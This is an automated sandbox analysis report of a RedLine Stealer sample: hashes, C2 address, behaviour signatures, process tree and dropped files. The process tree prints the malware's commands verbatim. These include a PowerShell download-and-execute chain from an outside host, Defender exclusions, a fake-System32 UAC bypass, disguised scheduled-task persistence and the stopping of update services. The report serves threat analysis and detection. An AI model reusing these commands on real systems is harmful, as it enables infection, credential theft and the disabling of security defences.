Analysis

  • max time kernel
    120s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/08/2023, 07:16

General

  • Target

    737307862171267fd72a88c78c79ba14.exe

  • Size

    382KB

  • MD5

    737307862171267fd72a88c78c79ba14

  • SHA1

    9576e06d485497f9aacb25fc6820281e50b82350

  • SHA256

    8deda3f9f857a91d1d9b3f420a3d9102a091849696a8f34b91e9413fc954a82f

  • SHA512

    12e9b8d7fa55d2c478988ce4cf5d9bd1ed91a36f2f76938e7edad8b540a1c3dab284b27baf68dec4c898db844d6dfc11132ec44c8c09efc8b5f0869b988fce69

  • SSDEEP

    6144:tFwR799OIQPd+iXhq+RaoIPqg3oHBcw3v9IliGS16dSg:tFO7DOIQPd+iXhq+RPR9IY

Malware Config

Extracted

Family

redline

C2

5.42.65.101:40676

Attributes
  • auth_value

    f6a00275f5a6ff201d2cc7f078cd5988

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3024
      • C:\Users\Admin\AppData\Local\Temp\737307862171267fd72a88c78c79ba14.exe
        "C:\Users\Admin\AppData\Local\Temp\737307862171267fd72a88c78c79ba14.exe"
        2⤵
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:3660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell New-Item '\\?\C:\Windows \System32' -ItemType Directory
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1044
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Move-Item -Path 'C:\Users\Admin\AppData\Local\Temp\ComputerDefaults.exe' -Destination '\\?\C:\Windows \System32\ComputerDefaults.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Move-Item -Path 'C:\Users\Admin\AppData\Local\Temp\profapi.dll' -Destination '\\?\C:\Windows \System32\profapi.dll'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Start-Process -FilePath 'C:\Windows \System32\ComputerDefaults.exe' -Verb RunAs"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:972
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath "$env:TEMP "; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/sys.xfx" -OutFile $env:TEMP"\sys.exe"; Start-Process -FilePath $env:TEMP"\sys.exe" -Verb RunAs; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/dwm.xfx" -OutFile $env:TEMP"\dwm.exe"; Start-Process -FilePath $env:TEMP"\dwm.exe" -Verb RunAs; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/updater.sfx" -OutFile $env:TEMP"\updater.exe"; Start-Process -FilePath $env:TEMP"\updater.exe" -Verb RunAs;
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5044
              • C:\Users\Admin\AppData\Local\Temp\sys.exe
                "C:\Users\Admin\AppData\Local\Temp\sys.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3348
              • C:\Users\Admin\AppData\Local\Temp\dwm.exe
                "C:\Users\Admin\AppData\Local\Temp\dwm.exe"
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4180
              • C:\Users\Admin\AppData\Local\Temp\updater.exe
                "C:\Users\Admin\AppData\Local\Temp\updater.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4080
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  "wmic" csproduct get UUID
                  7⤵
                    PID:1948
                  • C:\Windows\SysWOW64\tasklist.exe
                    "tasklist"
                    7⤵
                    • Enumerates processes with tasklist
                    PID:1372
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd" /C SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\updater.exe /F
                    7⤵
                      PID:4624
                    • C:\Windows\SysWOW64\tasklist.exe
                      "tasklist"
                      7⤵
                      • Enumerates processes with tasklist
                      PID:2920
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4988
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
              PID:4916
              • C:\Windows\System32\sc.exe
                sc stop UsoSvc
                3⤵
                • Launches sc.exe
                PID:3408
              • C:\Windows\System32\sc.exe
                sc stop bits
                3⤵
                • Launches sc.exe
                PID:1428
              • C:\Windows\System32\sc.exe
                sc stop dosvc
                3⤵
                • Launches sc.exe
                PID:2900
              • C:\Windows\System32\sc.exe
                sc stop wuauserv
                3⤵
                • Launches sc.exe
                PID:3336
              • C:\Windows\System32\sc.exe
                sc stop WaaSMedicSvc
                3⤵
                • Launches sc.exe
                PID:3656
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
                PID:4632
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-ac 0
                  3⤵
                    PID:3888
                  • C:\Windows\System32\powercfg.exe
                    powercfg /x -hibernate-timeout-dc 0
                    3⤵
                      PID:2004
                  • C:\Windows\System32\dialer.exe
                    C:\Windows\System32\dialer.exe
                    2⤵
                      PID:4944
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bybqeste#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                      2⤵
                        PID:5020
                    • C:\Windows\SysWOW64\schtasks.exe
                      SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\updater.exe /F
                      1⤵
                      • Creates scheduled task(s)
                      PID:4752

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            6cf293cb4d80be23433eecf74ddb5503

                            SHA1

                            24fe4752df102c2ef492954d6b046cb5512ad408

                            SHA256

                            b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                            SHA512

                            0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            d8b9a260789a22d72263ef3bb119108c

                            SHA1

                            376a9bd48726f422679f2cd65003442c0b6f6dd5

                            SHA256

                            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                            SHA512

                            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            446dd1cf97eaba21cf14d03aebc79f27

                            SHA1

                            36e4cc7367e0c7b40f4a8ace272941ea46373799

                            SHA256

                            a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                            SHA512

                            a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            446dd1cf97eaba21cf14d03aebc79f27

                            SHA1

                            36e4cc7367e0c7b40f4a8ace272941ea46373799

                            SHA256

                            a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                            SHA512

                            a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            64B

                            MD5

                            446dd1cf97eaba21cf14d03aebc79f27

                            SHA1

                            36e4cc7367e0c7b40f4a8ace272941ea46373799

                            SHA256

                            a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                            SHA512

                            a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Filesize

                            944B

                            MD5

                            96ff1ee586a153b4e7ce8661cabc0442

                            SHA1

                            140d4ff1840cb40601489f3826954386af612136

                            SHA256

                            0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                            SHA512

                            3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                          • C:\Users\Admin\AppData\Local\Temp\ComputerDefaults.exe

                            Filesize

                            80KB

                            MD5

                            d25a9e160e3b74ef2242023726f15416

                            SHA1

                            27a9bb9d7628d442f9b5cf47711c906e3315755b

                            SHA256

                            7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

                            SHA512

                            bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vfka3duu.olp.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\dwm.exe

                            Filesize

                            56.7MB

                            MD5

                            8812b172e27bcb0685c55b80608f9695

                            SHA1

                            4ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2

                            SHA256

                            3b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13

                            SHA512

                            4856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398

                          • C:\Users\Admin\AppData\Local\Temp\dwm.exe

                            Filesize

                            56.7MB

                            MD5

                            8812b172e27bcb0685c55b80608f9695

                            SHA1

                            4ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2

                            SHA256

                            3b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13

                            SHA512

                            4856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398

                          • C:\Users\Admin\AppData\Local\Temp\dwm.exe

                            Filesize

                            56.7MB

                            MD5

                            8812b172e27bcb0685c55b80608f9695

                            SHA1

                            4ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2

                            SHA256

                            3b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13

                            SHA512

                            4856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398

                          • C:\Users\Admin\AppData\Local\Temp\profapi.dll

                            Filesize

                            230KB

                            MD5

                            050ef3d85bac83445eeb3350c6b0f64c

                            SHA1

                            b02b07254651748bb19df39a4a425e31722a645f

                            SHA256

                            681c250701d3e04ec8a2eea90e430fc4bca987816dd9494796ee5fb2f8bd160b

                            SHA512

                            c857594f7b88755dd7d1b8bb2c6aa70baf0d53e0dbce9a2b1c95e17e5f021079e3132ea693b6ad230572bd67cce8f17f88a3897295a91ef00fa2c46fdbd61430

                          • C:\Users\Admin\AppData\Local\Temp\sys.exe

                            Filesize

                            248KB

                            MD5

                            449cb0cabf87880c7aa575a866695f22

                            SHA1

                            8ad5d038cd7de829a750f6c606f5e643c449b459

                            SHA256

                            ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808

                            SHA512

                            adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95

                          • C:\Users\Admin\AppData\Local\Temp\sys.exe

                            Filesize

                            248KB

                            MD5

                            449cb0cabf87880c7aa575a866695f22

                            SHA1

                            8ad5d038cd7de829a750f6c606f5e643c449b459

                            SHA256

                            ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808

                            SHA512

                            adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95

                          • C:\Users\Admin\AppData\Local\Temp\sys.exe

                            Filesize

                            248KB

                            MD5

                            449cb0cabf87880c7aa575a866695f22

                            SHA1

                            8ad5d038cd7de829a750f6c606f5e643c449b459

                            SHA256

                            ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808

                            SHA512

                            adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95

                          • C:\Users\Admin\AppData\Local\Temp\updater.exe

                            Filesize

                            2.1MB

                            MD5

                            dd533d8860430a112cfd5de394b44023

                            SHA1

                            dde8cbda172b456971fb829062dc41ef50c299c1

                            SHA256

                            5d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9

                            SHA512

                            13659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81

                          • C:\Users\Admin\AppData\Local\Temp\updater.exe

                            Filesize

                            2.1MB

                            MD5

                            dd533d8860430a112cfd5de394b44023

                            SHA1

                            dde8cbda172b456971fb829062dc41ef50c299c1

                            SHA256

                            5d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9

                            SHA512

                            13659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81

                          • C:\Users\Admin\AppData\Local\Temp\updater.exe

                            Filesize

                            2.1MB

                            MD5

                            dd533d8860430a112cfd5de394b44023

                            SHA1

                            dde8cbda172b456971fb829062dc41ef50c299c1

                            SHA256

                            5d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9

                            SHA512

                            13659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81

                          • C:\Windows \System32\ComputerDefaults.exe

                            Filesize

                            80KB

                            MD5

                            d25a9e160e3b74ef2242023726f15416

                            SHA1

                            27a9bb9d7628d442f9b5cf47711c906e3315755b

                            SHA256

                            7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

                            SHA512

                            bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

                          • C:\Windows \System32\profapi.dll

                            Filesize

                            230KB

                            MD5

                            050ef3d85bac83445eeb3350c6b0f64c

                            SHA1

                            b02b07254651748bb19df39a4a425e31722a645f

                            SHA256

                            681c250701d3e04ec8a2eea90e430fc4bca987816dd9494796ee5fb2f8bd160b

                            SHA512

                            c857594f7b88755dd7d1b8bb2c6aa70baf0d53e0dbce9a2b1c95e17e5f021079e3132ea693b6ad230572bd67cce8f17f88a3897295a91ef00fa2c46fdbd61430

                          • memory/64-329-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/64-326-0x000001BFB9940000-0x000001BFB9967000-memory.dmp

                            Filesize

                            156KB

                          • memory/600-316-0x000001F315F70000-0x000001F315F97000-memory.dmp

                            Filesize

                            156KB

                          • memory/600-313-0x000001F315B80000-0x000001F315BA1000-memory.dmp

                            Filesize

                            132KB

                          • memory/600-345-0x00007FF91D78D000-0x00007FF91D78E000-memory.dmp

                            Filesize

                            4KB

                          • memory/600-317-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/668-318-0x000001F29F830000-0x000001F29F857000-memory.dmp

                            Filesize

                            156KB

                          • memory/668-322-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/688-339-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/688-336-0x000002A2EDEC0000-0x000002A2EDEE7000-memory.dmp

                            Filesize

                            156KB

                          • memory/948-346-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/948-341-0x0000021320110000-0x0000021320137000-memory.dmp

                            Filesize

                            156KB

                          • memory/952-325-0x000001D424240000-0x000001D424267000-memory.dmp

                            Filesize

                            156KB

                          • memory/952-328-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1016-347-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1016-342-0x0000018C69B60000-0x0000018C69B87000-memory.dmp

                            Filesize

                            156KB

                          • memory/1044-133-0x0000010FF8690000-0x0000010FF86B2000-memory.dmp

                            Filesize

                            136KB

                          • memory/1044-147-0x00007FF8FFEB0000-0x00007FF900971000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1044-144-0x0000010FF84C0000-0x0000010FF84D0000-memory.dmp

                            Filesize

                            64KB

                          • memory/1044-143-0x00007FF8FFEB0000-0x00007FF900971000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1080-355-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1080-351-0x0000024D46960000-0x0000024D46987000-memory.dmp

                            Filesize

                            156KB

                          • memory/1172-356-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1172-353-0x000001C8BFD90000-0x000001C8BFDB7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1192-364-0x000001BA9E720000-0x000001BA9E747000-memory.dmp

                            Filesize

                            156KB

                          • memory/1192-368-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1316-369-0x000002322B4A0000-0x000002322B4C7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1316-376-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1340-370-0x000002C1F86F0000-0x000002C1F8717000-memory.dmp

                            Filesize

                            156KB

                          • memory/1340-378-0x00007FF8DD770000-0x00007FF8DD780000-memory.dmp

                            Filesize

                            64KB

                          • memory/1364-377-0x0000021961890000-0x00000219618B7000-memory.dmp

                            Filesize

                            156KB

                          • memory/1372-195-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/1372-194-0x0000022E1F0B0000-0x0000022E1F1FE000-memory.dmp

                            Filesize

                            1.3MB

                          • memory/1372-175-0x0000022E1EE20000-0x0000022E1EE30000-memory.dmp

                            Filesize

                            64KB

                          • memory/1372-172-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3348-261-0x0000000006180000-0x0000000006342000-memory.dmp

                            Filesize

                            1.8MB

                          • memory/3348-247-0x0000000004AB0000-0x00000000050C8000-memory.dmp

                            Filesize

                            6.1MB

                          • memory/3348-268-0x0000000074BF0000-0x00000000753A0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3348-264-0x00000000069C0000-0x0000000006A10000-memory.dmp

                            Filesize

                            320KB

                          • memory/3348-263-0x0000000006930000-0x00000000069A6000-memory.dmp

                            Filesize

                            472KB

                          • memory/3348-262-0x0000000006350000-0x000000000687C000-memory.dmp

                            Filesize

                            5.2MB

                          • memory/3348-251-0x0000000005310000-0x0000000005320000-memory.dmp

                            Filesize

                            64KB

                          • memory/3348-265-0x0000000005310000-0x0000000005320000-memory.dmp

                            Filesize

                            64KB

                          • memory/3348-249-0x0000000005290000-0x00000000052A2000-memory.dmp

                            Filesize

                            72KB

                          • memory/3348-241-0x0000000000400000-0x000000000043E000-memory.dmp

                            Filesize

                            248KB

                          • memory/3348-260-0x0000000005C30000-0x0000000005C96000-memory.dmp

                            Filesize

                            408KB

                          • memory/3348-259-0x0000000005B80000-0x0000000005C12000-memory.dmp

                            Filesize

                            584KB

                          • memory/3348-242-0x00000000021A0000-0x00000000021CA000-memory.dmp

                            Filesize

                            168KB

                          • memory/3348-246-0x0000000074BF0000-0x00000000753A0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3348-258-0x0000000074BF0000-0x00000000753A0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/3348-257-0x00000000054A0000-0x0000000005A44000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/3348-252-0x00000000052B0000-0x00000000052EC000-memory.dmp

                            Filesize

                            240KB

                          • memory/3348-248-0x0000000005160000-0x000000000526A000-memory.dmp

                            Filesize

                            1.0MB

                          • memory/3444-211-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3444-205-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/3444-206-0x000001E340B60000-0x000001E340B70000-memory.dmp

                            Filesize

                            64KB

                          • memory/3444-208-0x000001E340B60000-0x000001E340B70000-memory.dmp

                            Filesize

                            64KB

                          • memory/4080-337-0x0000000000550000-0x0000000000766000-memory.dmp

                            Filesize

                            2.1MB

                          • memory/4180-320-0x00007FF612350000-0x00007FF615C07000-memory.dmp

                            Filesize

                            56.7MB

                          • memory/4180-284-0x00007FF612350000-0x00007FF615C07000-memory.dmp

                            Filesize

                            56.7MB

                          • memory/4768-189-0x00000249A8A80000-0x00000249A8BCE000-memory.dmp

                            Filesize

                            1.3MB

                          • memory/4768-185-0x00000249A8770000-0x00000249A8780000-memory.dmp

                            Filesize

                            64KB

                          • memory/4768-186-0x00000249A8770000-0x00000249A8780000-memory.dmp

                            Filesize

                            64KB

                          • memory/4768-190-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4768-174-0x00007FF8FF030000-0x00007FF8FFAF1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4944-311-0x00007FF91CBF0000-0x00007FF91CCAE000-memory.dmp

                            Filesize

                            760KB

                          • memory/4944-310-0x00007FF91D6F0000-0x00007FF91D8E5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/4944-340-0x00007FF690D40000-0x00007FF690D69000-memory.dmp

                            Filesize

                            164KB

                          • memory/4988-307-0x00007FF8FEFF0000-0x00007FF8FFAB1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/4988-299-0x000002761AA70000-0x000002761AA80000-memory.dmp

                            Filesize

                            64KB

                          • memory/4988-283-0x000002761AA70000-0x000002761AA80000-memory.dmp

                            Filesize

                            64KB

                          • memory/4988-282-0x000002761AA70000-0x000002761AA80000-memory.dmp

                            Filesize

                            64KB

                          • memory/4988-281-0x00007FF8FEFF0000-0x00007FF8FFAB1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5044-250-0x00007FF8FEFF0000-0x00007FF8FFAB1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5044-215-0x00007FF8FEFF0000-0x00007FF8FFAB1000-memory.dmp

                            Filesize

                            10.8MB

                          • memory/5044-216-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-217-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-228-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-229-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-253-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-254-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-255-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-256-0x000001A20F720000-0x000001A20F730000-memory.dmp

                            Filesize

                            64KB

                          • memory/5044-304-0x00007FF8FEFF0000-0x00007FF8FFAB1000-memory.dmp

                            Filesize

                            10.8MB